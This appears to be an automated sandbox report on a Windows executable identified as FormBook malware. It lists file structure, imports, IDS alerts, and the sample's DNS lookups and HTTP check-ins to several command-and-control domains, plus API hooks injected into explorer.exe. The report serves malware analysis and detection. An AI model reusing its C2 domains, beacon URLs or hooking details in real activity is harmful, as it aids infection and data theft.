                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                      RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                      RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                      RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                      RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                      RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                      USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                      SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      06/11/21-13:17:26.479173TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3168.235.88.209
                                                                                      06/11/21-13:17:26.479173TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3168.235.88.209
                                                                                      06/11/21-13:17:26.479173TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.3168.235.88.209
                                                                                      06/11/21-13:18:09.635602TCP1201ATTACK-RESPONSES 403 Forbidden804974434.102.136.180192.168.2.3

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jun 11, 2021 13:17:07.099303961 CEST4973380192.168.2.3142.250.180.243
                                                                                      Jun 11, 2021 13:17:07.160387039 CEST8049733142.250.180.243192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.160540104 CEST4973380192.168.2.3142.250.180.243
                                                                                      Jun 11, 2021 13:17:07.160631895 CEST4973380192.168.2.3142.250.180.243
                                                                                      Jun 11, 2021 13:17:07.221529007 CEST8049733142.250.180.243192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.244602919 CEST8049733142.250.180.243192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.244649887 CEST8049733142.250.180.243192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.245737076 CEST4973380192.168.2.3142.250.180.243
                                                                                      Jun 11, 2021 13:17:07.245819092 CEST4973380192.168.2.3142.250.180.243
                                                                                      Jun 11, 2021 13:17:07.306950092 CEST8049733142.250.180.243192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.353113890 CEST4974080192.168.2.3168.235.88.209
                                                                                      Jun 11, 2021 13:17:26.478756905 CEST8049740168.235.88.209192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.478907108 CEST4974080192.168.2.3168.235.88.209
                                                                                      Jun 11, 2021 13:17:26.479172945 CEST4974080192.168.2.3168.235.88.209
                                                                                      Jun 11, 2021 13:17:26.604927063 CEST8049740168.235.88.209192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.604996920 CEST8049740168.235.88.209192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.605030060 CEST8049740168.235.88.209192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.605240107 CEST4974080192.168.2.3168.235.88.209
                                                                                      Jun 11, 2021 13:17:26.605274916 CEST4974080192.168.2.3168.235.88.209
                                                                                      Jun 11, 2021 13:17:26.731089115 CEST8049740168.235.88.209192.168.2.3
                                                                                      Jun 11, 2021 13:17:46.943417072 CEST4974180192.168.2.3159.89.244.183
                                                                                      Jun 11, 2021 13:17:47.070945024 CEST8049741159.89.244.183192.168.2.3
                                                                                      Jun 11, 2021 13:17:47.071057081 CEST4974180192.168.2.3159.89.244.183
                                                                                      Jun 11, 2021 13:17:47.071191072 CEST4974180192.168.2.3159.89.244.183
                                                                                      Jun 11, 2021 13:17:47.198822975 CEST8049741159.89.244.183192.168.2.3
                                                                                      Jun 11, 2021 13:17:47.198865891 CEST8049741159.89.244.183192.168.2.3
                                                                                      Jun 11, 2021 13:17:47.198894978 CEST8049741159.89.244.183192.168.2.3
                                                                                      Jun 11, 2021 13:17:47.199040890 CEST4974180192.168.2.3159.89.244.183
                                                                                      Jun 11, 2021 13:17:47.199083090 CEST4974180192.168.2.3159.89.244.183
                                                                                      Jun 11, 2021 13:17:47.328054905 CEST8049741159.89.244.183192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.453979015 CEST4974480192.168.2.334.102.136.180
                                                                                      Jun 11, 2021 13:18:09.496193886 CEST804974434.102.136.180192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.496407986 CEST4974480192.168.2.334.102.136.180
                                                                                      Jun 11, 2021 13:18:09.496512890 CEST4974480192.168.2.334.102.136.180
                                                                                      Jun 11, 2021 13:18:09.538758993 CEST804974434.102.136.180192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.635601997 CEST804974434.102.136.180192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.635651112 CEST804974434.102.136.180192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.635879040 CEST4974480192.168.2.334.102.136.180
                                                                                      Jun 11, 2021 13:18:09.635945082 CEST4974480192.168.2.334.102.136.180
                                                                                      Jun 11, 2021 13:18:09.678459883 CEST804974434.102.136.180192.168.2.3

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jun 11, 2021 13:16:00.477242947 CEST5598453192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:00.535623074 CEST53559848.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:01.364681959 CEST6418553192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:01.423135042 CEST53641858.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:02.154920101 CEST6511053192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:02.216130972 CEST53651108.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:02.961894989 CEST5836153192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:03.012481928 CEST53583618.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:03.829423904 CEST6349253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:03.883028030 CEST53634928.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:04.826154947 CEST6083153192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:04.879234076 CEST53608318.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:05.713776112 CEST6010053192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:05.766681910 CEST53601008.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:06.733460903 CEST5319553192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:06.783581972 CEST53531958.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:07.550322056 CEST5014153192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:07.601269960 CEST53501418.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:08.434130907 CEST5302353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:08.485183954 CEST53530238.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:09.220379114 CEST4956353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:09.270889044 CEST53495638.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:10.143351078 CEST5135253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:10.196475983 CEST53513528.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:11.505176067 CEST5934953192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:11.556746960 CEST53593498.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:12.765260935 CEST5708453192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:12.815587997 CEST53570848.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:13.655117989 CEST5882353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:13.713887930 CEST53588238.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:14.434154987 CEST5756853192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:14.484518051 CEST53575688.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:15.366101980 CEST5054053192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:15.419224024 CEST53505408.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:16.616947889 CEST5436653192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:16.667341948 CEST53543668.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:17.391630888 CEST5303453192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:17.444385052 CEST53530348.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:34.987735987 CEST5776253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:35.049618959 CEST53577628.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:16:44.285569906 CEST5543553192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:16:44.344434023 CEST53554358.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:07.007029057 CEST5071353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:07.093458891 CEST53507138.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:19.431802988 CEST5613253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:19.501478910 CEST53561328.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:23.321549892 CEST5898753192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:23.384686947 CEST53589878.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:26.274321079 CEST5657953192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST53565798.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:46.783575058 CEST6063353192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:46.941773891 CEST53606338.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:54.752721071 CEST6129253192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:54.820560932 CEST53612928.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:17:56.146701097 CEST6361953192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:17:56.208626032 CEST53636198.8.8.8192.168.2.3
                                                                                      Jun 11, 2021 13:18:09.391463995 CEST6493853192.168.2.38.8.8.8
                                                                                      Jun 11, 2021 13:18:09.452832937 CEST53649388.8.8.8192.168.2.3

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Jun 11, 2021 13:17:07.007029057 CEST192.168.2.38.8.8.80xb120Standard query (0)www.vacalinda.comA (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.274321079 CEST192.168.2.38.8.8.80xc82dStandard query (0)www.servicesbackyard.comA (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:46.783575058 CEST192.168.2.38.8.8.80xade4Standard query (0)www.djspencer.comA (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:18:09.391463995 CEST192.168.2.38.8.8.80xd817Standard query (0)www.caravansforsalenorthwales.comA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Jun 11, 2021 13:17:07.093458891 CEST8.8.8.8192.168.2.30xb120No error (0)www.vacalinda.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:07.093458891 CEST8.8.8.8192.168.2.30xb120No error (0)ghs.googlehosted.com142.250.180.243A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)www.servicesbackyard.comparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com188.164.131.200A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:26.350822926 CEST8.8.8.8192.168.2.30xc82dNo error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:46.941773891 CEST8.8.8.8192.168.2.30xade4No error (0)www.djspencer.com159.89.244.183A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:17:46.941773891 CEST8.8.8.8192.168.2.30xade4No error (0)www.djspencer.com164.90.244.158A (IP address)IN (0x0001)
                                                                                      Jun 11, 2021 13:18:09.452832937 CEST8.8.8.8192.168.2.30xd817No error (0)www.caravansforsalenorthwales.comcaravansforsalenorthwales.comCNAME (Canonical name)IN (0x0001)
                                                                                      Jun 11, 2021 13:18:09.452832937 CEST8.8.8.8192.168.2.30xd817No error (0)caravansforsalenorthwales.com34.102.136.180A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.vacalinda.com
                                                                                      • www.servicesbackyard.com
                                                                                      • www.djspencer.com
                                                                                      • www.caravansforsalenorthwales.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.349733142.250.180.24380C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jun 11, 2021 13:17:07.160631895 CEST1261OUTGET /ngvm/?w6A=st23zvU/E1xU5Qy7Hp2PD30UnMfCa5knANSLf3ItiB6oVvQd6+qg6yvUWRtcyiXbPLds&3fox=SBZ4 HTTP/1.1
                                                                                      Host: www.vacalinda.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Jun 11, 2021 13:17:07.244602919 CEST1262INHTTP/1.1 301 Moved Permanently
                                                                                      Location: http://www.vacalinda.cl
                                                                                      Date: Fri, 11 Jun 2021 11:17:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Server: ghs
                                                                                      Content-Length: 220
                                                                                      X-XSS-Protection: 0
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Connection: close
                                                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 61 63 61 6c 69 6e 64 61 2e 63 6c 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.vacalinda.cl">here</A>.</BODY></HTML>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.349740168.235.88.20980C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jun 11, 2021 13:17:26.479172945 CEST5247OUTGET /ngvm/?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4 HTTP/1.1
                                                                                      Host: www.servicesbackyard.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Jun 11, 2021 13:17:26.604996920 CEST5247INHTTP/1.1 302 Moved Temporarily
                                                                                      Server: nginx
                                                                                      Date: Fri, 11 Jun 2021 11:17:26 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 154
                                                                                      Connection: close
                                                                                      Location: http://www.servicesbackyard.com?w6A=UyLqygKx2FmdGYSRh5mqmU7zHOPmyh0H52xSnc3cVgCKFPBqoRmOJ0eYguKTgHZNEA4k&3fox=SBZ4
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.349741159.89.244.18380C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jun 11, 2021 13:17:47.071191072 CEST5251OUTGET /ngvm/?w6A=HBVp1ZFUGcT+hxfW3ntFEbmU5GO8vrkA1mLmG5vd048TCTgwy52mAcu3AE2RaU7PuRfb&3fox=SBZ4 HTTP/1.1
                                                                                      Host: www.djspencer.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Jun 11, 2021 13:17:47.198865891 CEST5252INHTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Fri, 11 Jun 2021 11:17:47 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 178
                                                                                      Connection: close
                                                                                      Location: https://perfectdomain.com/domain/djspencer.com
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.34974434.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Jun 11, 2021 13:18:09.496512890 CEST5271OUTGET /ngvm/?w6A=uz7CW46zGnQqpjgqznnFmpPrWAklZoEybcG+oUJN9dvYL4OpOEr/HbmCuGHk2zZbqVpb&3fox=SBZ4 HTTP/1.1
                                                                                      Host: www.caravansforsalenorthwales.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Jun 11, 2021 13:18:09.635601997 CEST5271INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Fri, 11 Jun 2021 11:18:09 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "60c03ab8-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Code Manipulations

                                                                                      User Modules

                                                                                      Hook Summary

                                                                                      Function NameHook TypeActive in Processes
                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                      GetMessageWINLINEexplorer.exe
                                                                                      GetMessageAINLINEexplorer.exe

                                                                                      Processes

                                                                                      Process: explorer.exe, Module: user32.dll
                                                                                      Function NameHook TypeNew Data
                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xED
                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xED
                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x82 0x2E 0xED
                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xED

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: SX365783909782021.exe PID: 4092 Parent PID: 5660

                                                                                      General

                                                                                      Start time:13:16:05
                                                                                      Start date:11/06/2021
                                                                                      Path:C:\Users\user\Desktop\SX365783909782021.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\SX365783909782021.exe'
                                                                                      Imagebase:0x400000
                                                                                      File size:245880 bytes
                                                                                      MD5 hash:EE1F4A07B874AA6BA18D6AA0F83252D3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.211210535.00000000022B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
